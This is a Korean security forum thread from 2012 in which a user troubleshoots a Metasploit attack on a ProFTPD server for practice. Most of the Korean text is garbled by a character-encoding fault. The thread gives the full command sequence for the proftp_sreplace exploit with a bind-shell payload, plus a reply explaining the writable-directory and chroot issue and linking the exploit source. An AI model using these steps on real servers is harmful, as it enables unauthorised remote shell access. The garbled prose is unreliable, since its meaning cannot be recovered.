|
|


22019, 1/1101 |
![]() |
![]() |
![]() |
![]() |
|
xhosa123 | ||||||
|
ftp ¼¹ö °ø°Ý ½Ç½À Áß,,, | ||||||
|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=29802 [º¹»ç]
Hit : 7344 Date : 2012/12/01 10:30
|
|||||||
| ![]() |
| |
| ¼Ò½ºÄÚµå ·¹º§¿¡¼ º¸´Â ½À°üÀ» µéÀÌ½Ã¸é ±Ý¹æ ´äÀÌ ³ª¿Ã µíÇÕ´Ï´Ù! | 2012/12/01 | |
|
| ÇØ´ç ¿¡·¯¸¦ Ãâ·ÂÇϱâ Àü¿¡ ¾î¶² ftp command¸¦ ½ÇÇàÇÏ·Á°í ½ÃµµÇß´ÂÁö È®ÀÎÇØ º¸¼¼¿è | 2012/12/01 | |
|
| xhosa123 | ¤¤¸Û¸Û msf exploit(proftp_sreplace) > use exploit/linux/ftp/proftp_sreplace msf exploit(proftp_sreplace) > set TARGET 2 TARGET => 2 msf exploit(proftp_sreplace) > set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD => linux/x86/shell_bind_tcp msf exploit(proftp_sreplace) > set RHOST RHOST => msf exploit(proftp_sreplace) > set WRITABLE /root WRITABLE => /root msf exploit(proftp_sreplace) > exploit ÀÌ·¸°Ô ¸í·É¾î¸¦ Áá´Âµ¥ ÁÁÁö¾ÊÀº ¿µ¾î½Ç·ÂÀ¸·Î ÇØ¼®Çغ¸´Ï »ç¿ëÁßÀÎ ftp°æ·Î°¡ ¾ø´Ù°í ³ª¿À³×¿ä.. °æ·Î¸¦ ¸¸µé¾îÁÖ°í ´Ù½Ã ½ÃµµÇغÁ¾ß°Ú¾î¿ä. °¨»çÇÕ´Ï´Ù |
2012/12/01 | |
| ¾Æ Á¦°¡ ¸»¾¸µå¸° Ä¿¸Çµå¶õ, ¸ÞŸ½ºÇ÷ÎÀÕ Ä¿¸Çµå°¡ ¾Æ´Ñ ftp ¼¹öÃø¿¡ ½ÇÇàÇÏ´Â Ä¿¸Çµå Áï, exploit/linux/ftp/proftp_sreplace ¼Ò½ºÆÄÀÏ ³»¿¡ ¸í½ÃµÈ ºÎºÐÀ» ¸»ÇÑ °ÍÀÔ´Ï´ç ±×¸®°í WRITABLEÀº ftp °ø°Ý¿¡¼ ÈçÈ÷ ¿ä±¸µÇ´Â "¾²±â ±ÇÇÑÀÌ ÀÖ´Â µð·ºÅ丮"¸¦ ¸»ÇÏ´Â °Í °°³×¿ä /root¶ó°í ÇÏ¸é ¾²±â ±ÇÇÑ¿¡ ÃæÁ·µÇÁö ¾ÊÀ» °Í °°½À´Ï´Ù. http://www.exploit-db.com/exploits/16852/ ¼Ò½º¸¦ Àá½Ã º¸´Ï "CWD /root"¶ó´Â ¸í·ÉÀ» ½ÇÇàÇÏ°Ô µÇ´Âµ¥, /root¶ó´Â µð·ºÅ丮°¡ ¾øÀ¸¹Ç·Î Unable to get current working directory ¿¡·¯°¡ ³ª´Â °Í °°³×¿ä ÃÖ±Ù ftp ¼¹öµéÀº chroot°¡ Àû¿ëµÇ±â ¶§¹®¿¡ »óÀ§°æ·ÎÀÎ /root°¡ ¾ø´Ù°í ³ª¿À´Â °ÍÀÏ °Ì´Ï´Ù |
2012/12/01 | |
|
| xhosa123 | ±×·³ ¾²±â°¡´ÉÇѰæ·Î¸¦ Àû¾îÁà¾ßÇϳª¿ä? | 2012/12/01 | |
| xhosa123 | ¿¹¸¦µé¾î¼¾î¶²°æ·Î¸¦Àû¾îÁà¾ßÇϳª¿ä? | 2012/12/01 | |
| ÀÌÁ¤µµ´Â Á÷Á¢ ÇÏ½Ç ¼ö ÀÖÀ» °Í °°Àºµ¥¿ä..~! | 2012/12/05 | |
|
|